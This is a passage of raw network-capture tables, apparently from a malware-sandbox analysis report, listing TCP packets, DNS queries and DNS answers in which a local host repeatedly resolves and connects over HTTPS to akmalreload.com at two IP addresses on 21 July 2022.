      Jul 21, 2022 14:27:36.080518007 CEST44349177104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:36.080687046 CEST49177443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:36.081052065 CEST49177443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:36.081501007 CEST49178443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:36.081556082 CEST44349177104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:36.081577063 CEST44349178104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:36.081630945 CEST44349177104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:36.081645966 CEST49177443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:36.081701994 CEST49178443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:36.081727982 CEST49177443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:36.082015038 CEST49178443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:36.082046986 CEST44349178104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:36.169759989 CEST44349178104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:36.170444012 CEST49178443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:36.170481920 CEST44349178104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:36.171953917 CEST49178443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:36.171976089 CEST44349178104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:36.848270893 CEST44349178104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:36.848417044 CEST44349178104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:36.848541021 CEST49178443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:36.848815918 CEST49178443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:36.848861933 CEST44349178104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:36.848880053 CEST49178443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:36.848896980 CEST44349178104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:36.914237022 CEST49179443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:36.914277077 CEST44349179104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:36.914340973 CEST49179443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:36.914800882 CEST49179443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:36.914815903 CEST44349179104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:36.996958017 CEST44349179104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:36.997071028 CEST49179443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:37.014069080 CEST49179443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:37.014089108 CEST44349179104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:37.017164946 CEST49179443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:37.017177105 CEST44349179104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:37.737291098 CEST44349179104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:37.737423897 CEST44349179104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:37.737490892 CEST44349179104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:37.737550974 CEST44349179104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:37.737616062 CEST44349179104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:37.737670898 CEST44349179104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:37.737675905 CEST49179443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:37.737730980 CEST44349179104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:37.737755060 CEST49179443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:37.737766981 CEST49179443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:37.737798929 CEST49179443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:37.737813950 CEST44349179104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:37.737896919 CEST49179443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:37.742938995 CEST49179443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:37.743326902 CEST44349179104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:37.743386030 CEST44349179104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:37.743503094 CEST49179443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:37.743535995 CEST49179443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:37.968354940 CEST49180443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:37.968389034 CEST44349180104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:37.968462944 CEST49180443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:37.969604015 CEST49180443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:37.969621897 CEST44349180104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:38.051703930 CEST44349180104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:38.051839113 CEST49180443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:38.071655989 CEST49180443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:38.071675062 CEST44349180104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:38.075315952 CEST49180443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:38.075341940 CEST44349180104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:38.343852043 CEST44349180104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:38.343945980 CEST44349180104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:38.343977928 CEST49180443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:38.344000101 CEST49180443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:38.344310045 CEST49180443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:38.344326973 CEST44349180104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:38.573863029 CEST49181443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:38.573942900 CEST44349181104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:38.574031115 CEST49181443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:38.574377060 CEST49181443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:38.574404955 CEST44349181104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:38.663527966 CEST44349181104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:38.663702011 CEST49181443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:38.669939995 CEST49181443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:38.669977903 CEST44349181104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:38.672832012 CEST49181443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:38.672871113 CEST44349181104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:39.085661888 CEST44349181104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:39.085753918 CEST49181443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:39.085777998 CEST44349181104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:39.085827112 CEST49181443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:39.085844040 CEST44349181104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:39.085895061 CEST49181443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:39.085933924 CEST44349181104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:39.085972071 CEST49181443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:39.085987091 CEST44349181104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:39.086051941 CEST49181443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:39.086081028 CEST49181443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:39.086093903 CEST49181443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:39.175323009 CEST49182443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:39.175369978 CEST44349182172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:39.175477028 CEST49182443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:39.175836086 CEST49182443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:39.175865889 CEST44349182172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:39.267877102 CEST44349182172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:39.268027067 CEST49182443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:39.279398918 CEST49182443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:39.279432058 CEST44349182172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:39.280096054 CEST44349182172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:39.289319992 CEST49182443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:39.332552910 CEST44349182172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:39.608346939 CEST44349182172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:39.812540054 CEST44349182172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:39.812845945 CEST49182443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:39.813033104 CEST49182443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:39.813060045 CEST44349182172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:39.813442945 CEST49182443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:39.813549995 CEST44349182172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:39.813630104 CEST44349182172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:39.813821077 CEST49182443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:40.809472084 CEST49183443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:40.809518099 CEST44349183172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:40.811158895 CEST49183443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:40.816663027 CEST49183443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:40.816730022 CEST44349183172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:40.908801079 CEST44349183172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:40.909148932 CEST49183443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:40.923762083 CEST49183443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:40.923791885 CEST44349183172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:40.924587965 CEST44349183172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:40.928057909 CEST49183443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:40.968503952 CEST44349183172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:41.197715998 CEST44349183172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:41.197840929 CEST44349183172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:41.197979927 CEST49183443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:41.199367046 CEST49183443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:41.199390888 CEST44349183172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:41.199533939 CEST49184443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:41.199568987 CEST44349184172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:41.199621916 CEST49184443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:41.199912071 CEST49184443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:41.199927092 CEST44349184172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:41.285332918 CEST44349184172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:41.285919905 CEST49184443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:41.285940886 CEST44349184172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:41.287230968 CEST49184443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:41.287249088 CEST44349184172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:41.609755039 CEST44349184172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:41.610163927 CEST44349184172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:41.610752106 CEST49184443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:41.610956907 CEST49184443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:41.610997915 CEST44349184172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:41.611013889 CEST49184443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:41.611026049 CEST44349184172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:41.611062050 CEST49184443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:41.611074924 CEST44349184172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:42.757445097 CEST49185443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:42.757503986 CEST44349185172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:42.757669926 CEST49185443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:42.758820057 CEST49185443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:42.758846045 CEST44349185172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:42.842710018 CEST44349185172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:42.842904091 CEST49185443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:42.854588985 CEST49185443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:42.854614019 CEST44349185172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:42.855540991 CEST44349185172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:42.858131886 CEST49185443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:42.900554895 CEST44349185172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:43.498276949 CEST44349185172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:43.695836067 CEST49185443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:43.695856094 CEST44349185172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:43.696208000 CEST49185443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:43.696542978 CEST49186443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:43.696582079 CEST44349186172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:43.696656942 CEST49186443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:43.696669102 CEST44349185172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:43.696737051 CEST44349185172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:43.696760893 CEST49185443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:43.696942091 CEST49185443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:43.697191000 CEST49186443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:43.697206974 CEST44349186172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:44.079690933 CEST44349186172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:44.081393957 CEST49186443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:44.081413031 CEST44349186172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:44.082473993 CEST49186443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:44.082483053 CEST44349186172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:44.753102064 CEST44349186172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:44.753299952 CEST44349186172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:44.753487110 CEST49186443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:44.983582020 CEST49186443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:44.983629942 CEST44349186172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:44.983647108 CEST49186443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:44.983660936 CEST44349186172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:44.983671904 CEST49186443192.168.2.22172.67.190.5
      Jul 21, 2022 14:27:44.983681917 CEST44349186172.67.190.5192.168.2.22
      Jul 21, 2022 14:27:45.066617012 CEST49187443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:45.066679955 CEST44349187104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:45.066821098 CEST49187443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:45.067049980 CEST49187443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:45.067070961 CEST44349187104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:45.149970055 CEST44349187104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:45.150176048 CEST49187443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:45.158791065 CEST49187443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:45.158827066 CEST44349187104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:45.162333012 CEST49187443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:45.162358046 CEST44349187104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:45.813380003 CEST44349187104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:45.813743114 CEST49187443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:45.813771963 CEST44349187104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:45.813829899 CEST49187443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:46.092926979 CEST44349187104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:46.093061924 CEST44349187104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:46.093123913 CEST49187443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:46.093147993 CEST49187443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:48.384279966 CEST49187443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:48.384314060 CEST44349187104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:48.496455908 CEST49188443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:48.496514082 CEST44349188104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:48.504605055 CEST49188443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:48.567487001 CEST49188443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:48.567526102 CEST44349188104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:48.656311035 CEST44349188104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:48.656496048 CEST49188443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:48.738934994 CEST49188443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:48.738966942 CEST44349188104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:48.741800070 CEST49188443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:48.741827965 CEST44349188104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:49.066761971 CEST44349188104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:49.066957951 CEST49188443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:49.066978931 CEST44349188104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:49.067049026 CEST49188443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:49.067190886 CEST49188443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:49.067398071 CEST44349188104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:49.067434072 CEST44349188104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:49.067507982 CEST49188443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:49.067523956 CEST49188443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:49.365328074 CEST49189443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:49.365391016 CEST44349189104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:49.365519047 CEST49189443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:49.385555029 CEST49189443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:49.385596037 CEST44349189104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:49.469010115 CEST44349189104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:49.469208002 CEST49189443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:49.506390095 CEST49189443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:49.506403923 CEST44349189104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:49.510364056 CEST49189443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:49.510373116 CEST44349189104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:49.774564981 CEST44349189104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:49.774777889 CEST49189443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:49.774806023 CEST44349189104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:49.774894953 CEST49189443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:49.775106907 CEST49189443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:49.775415897 CEST44349189104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:49.775480986 CEST44349189104.21.73.122192.168.2.22
      Jul 21, 2022 14:27:49.775667906 CEST49189443192.168.2.22104.21.73.122
      Jul 21, 2022 14:27:49.775693893 CEST49189443192.168.2.22104.21.73.122

      UDP Packets

      TimestampSource PortDest PortSource IPDest IP
      Jul 21, 2022 14:27:15.512864113 CEST5586853192.168.2.228.8.8.8
      Jul 21, 2022 14:27:15.549956083 CEST53558688.8.8.8192.168.2.22
      Jul 21, 2022 14:27:23.511842966 CEST4968853192.168.2.228.8.8.8
      Jul 21, 2022 14:27:23.538865089 CEST53496888.8.8.8192.168.2.22
      Jul 21, 2022 14:27:23.556592941 CEST5883653192.168.2.228.8.8.8
      Jul 21, 2022 14:27:23.583969116 CEST53588368.8.8.8192.168.2.22
      Jul 21, 2022 14:27:29.300681114 CEST5013453192.168.2.228.8.8.8
      Jul 21, 2022 14:27:29.323832035 CEST53501348.8.8.8192.168.2.22
      Jul 21, 2022 14:27:29.329186916 CEST5527553192.168.2.228.8.8.8
      Jul 21, 2022 14:27:29.370870113 CEST53552758.8.8.8192.168.2.22
      Jul 21, 2022 14:27:32.023483992 CEST5991553192.168.2.228.8.8.8
      Jul 21, 2022 14:27:32.046896935 CEST53599158.8.8.8192.168.2.22
      Jul 21, 2022 14:27:32.049637079 CEST5440853192.168.2.228.8.8.8
      Jul 21, 2022 14:27:32.086246014 CEST53544088.8.8.8192.168.2.22
      Jul 21, 2022 14:27:35.056154966 CEST5010853192.168.2.228.8.8.8
      Jul 21, 2022 14:27:35.079658031 CEST53501088.8.8.8192.168.2.22
      Jul 21, 2022 14:27:35.085864067 CEST5472353192.168.2.228.8.8.8
      Jul 21, 2022 14:27:35.128310919 CEST53547238.8.8.8192.168.2.22
      Jul 21, 2022 14:27:39.121766090 CEST5806253192.168.2.228.8.8.8
      Jul 21, 2022 14:27:39.144685984 CEST53580628.8.8.8192.168.2.22
      Jul 21, 2022 14:27:39.149637938 CEST5670353192.168.2.228.8.8.8
      Jul 21, 2022 14:27:39.172910929 CEST53567038.8.8.8192.168.2.22
      Jul 21, 2022 14:27:40.740448952 CEST5924153192.168.2.228.8.8.8
      Jul 21, 2022 14:27:40.781209946 CEST53592418.8.8.8192.168.2.22
      Jul 21, 2022 14:27:40.785455942 CEST5524453192.168.2.228.8.8.8
      Jul 21, 2022 14:27:40.808691025 CEST53552448.8.8.8192.168.2.22
      Jul 21, 2022 14:27:42.705621004 CEST5395853192.168.2.228.8.8.8
      Jul 21, 2022 14:27:42.729373932 CEST53539588.8.8.8192.168.2.22
      Jul 21, 2022 14:27:42.732542038 CEST5602053192.168.2.228.8.8.8
      Jul 21, 2022 14:27:42.755990982 CEST53560208.8.8.8192.168.2.22

      DNS Queries

      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
      Jul 21, 2022 14:27:15.512864113 CEST192.168.2.228.8.8.80x88f3Standard query (0)akmalreload.comA (IP address)IN (0x0001)
      Jul 21, 2022 14:27:23.511842966 CEST192.168.2.228.8.8.80xfcfStandard query (0)akmalreload.comA (IP address)IN (0x0001)
      Jul 21, 2022 14:27:23.556592941 CEST192.168.2.228.8.8.80x33a2Standard query (0)akmalreload.comA (IP address)IN (0x0001)
      Jul 21, 2022 14:27:29.300681114 CEST192.168.2.228.8.8.80xf2caStandard query (0)akmalreload.comA (IP address)IN (0x0001)
      Jul 21, 2022 14:27:29.329186916 CEST192.168.2.228.8.8.80xdc64Standard query (0)akmalreload.comA (IP address)IN (0x0001)
      Jul 21, 2022 14:27:32.023483992 CEST192.168.2.228.8.8.80x646cStandard query (0)akmalreload.comA (IP address)IN (0x0001)
      Jul 21, 2022 14:27:32.049637079 CEST192.168.2.228.8.8.80x12f1Standard query (0)akmalreload.comA (IP address)IN (0x0001)
      Jul 21, 2022 14:27:35.056154966 CEST192.168.2.228.8.8.80xe6e0Standard query (0)akmalreload.comA (IP address)IN (0x0001)
      Jul 21, 2022 14:27:35.085864067 CEST192.168.2.228.8.8.80x6703Standard query (0)akmalreload.comA (IP address)IN (0x0001)
      Jul 21, 2022 14:27:39.121766090 CEST192.168.2.228.8.8.80xe23aStandard query (0)akmalreload.comA (IP address)IN (0x0001)
      Jul 21, 2022 14:27:39.149637938 CEST192.168.2.228.8.8.80xa865Standard query (0)akmalreload.comA (IP address)IN (0x0001)
      Jul 21, 2022 14:27:40.740448952 CEST192.168.2.228.8.8.80x7820Standard query (0)akmalreload.comA (IP address)IN (0x0001)
      Jul 21, 2022 14:27:40.785455942 CEST192.168.2.228.8.8.80x2c87Standard query (0)akmalreload.comA (IP address)IN (0x0001)
      Jul 21, 2022 14:27:42.705621004 CEST192.168.2.228.8.8.80x4c7aStandard query (0)akmalreload.comA (IP address)IN (0x0001)
      Jul 21, 2022 14:27:42.732542038 CEST192.168.2.228.8.8.80x288aStandard query (0)akmalreload.comA (IP address)IN (0x0001)

      DNS Answers

      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
      Jul 21, 2022 14:27:15.549956083 CEST8.8.8.8192.168.2.220x88f3No error (0)akmalreload.com104.21.73.122A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:15.549956083 CEST8.8.8.8192.168.2.220x88f3No error (0)akmalreload.com172.67.190.5A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:23.538865089 CEST8.8.8.8192.168.2.220xfcfNo error (0)akmalreload.com104.21.73.122A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:23.538865089 CEST8.8.8.8192.168.2.220xfcfNo error (0)akmalreload.com172.67.190.5A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:23.583969116 CEST8.8.8.8192.168.2.220x33a2No error (0)akmalreload.com104.21.73.122A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:23.583969116 CEST8.8.8.8192.168.2.220x33a2No error (0)akmalreload.com172.67.190.5A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:29.323832035 CEST8.8.8.8192.168.2.220xf2caNo error (0)akmalreload.com104.21.73.122A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:29.323832035 CEST8.8.8.8192.168.2.220xf2caNo error (0)akmalreload.com172.67.190.5A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:29.370870113 CEST8.8.8.8192.168.2.220xdc64No error (0)akmalreload.com172.67.190.5A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:29.370870113 CEST8.8.8.8192.168.2.220xdc64No error (0)akmalreload.com104.21.73.122A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:32.046896935 CEST8.8.8.8192.168.2.220x646cNo error (0)akmalreload.com104.21.73.122A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:32.046896935 CEST8.8.8.8192.168.2.220x646cNo error (0)akmalreload.com172.67.190.5A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:32.086246014 CEST8.8.8.8192.168.2.220x12f1No error (0)akmalreload.com172.67.190.5A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:32.086246014 CEST8.8.8.8192.168.2.220x12f1No error (0)akmalreload.com104.21.73.122A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:35.079658031 CEST8.8.8.8192.168.2.220xe6e0No error (0)akmalreload.com104.21.73.122A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:35.079658031 CEST8.8.8.8192.168.2.220xe6e0No error (0)akmalreload.com172.67.190.5A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:35.128310919 CEST8.8.8.8192.168.2.220x6703No error (0)akmalreload.com172.67.190.5A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:35.128310919 CEST8.8.8.8192.168.2.220x6703No error (0)akmalreload.com104.21.73.122A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:39.144685984 CEST8.8.8.8192.168.2.220xe23aNo error (0)akmalreload.com172.67.190.5A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:39.144685984 CEST8.8.8.8192.168.2.220xe23aNo error (0)akmalreload.com104.21.73.122A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:39.172910929 CEST8.8.8.8192.168.2.220xa865No error (0)akmalreload.com104.21.73.122A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:39.172910929 CEST8.8.8.8192.168.2.220xa865No error (0)akmalreload.com172.67.190.5A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:40.781209946 CEST8.8.8.8192.168.2.220x7820No error (0)akmalreload.com172.67.190.5A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:40.781209946 CEST8.8.8.8192.168.2.220x7820No error (0)akmalreload.com104.21.73.122A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:40.808691025 CEST8.8.8.8192.168.2.220x2c87No error (0)akmalreload.com104.21.73.122A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:40.808691025 CEST8.8.8.8192.168.2.220x2c87No error (0)akmalreload.com172.67.190.5A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:42.729373932 CEST8.8.8.8192.168.2.220x4c7aNo error (0)akmalreload.com172.67.190.5A (IP address)IN (0x0001)
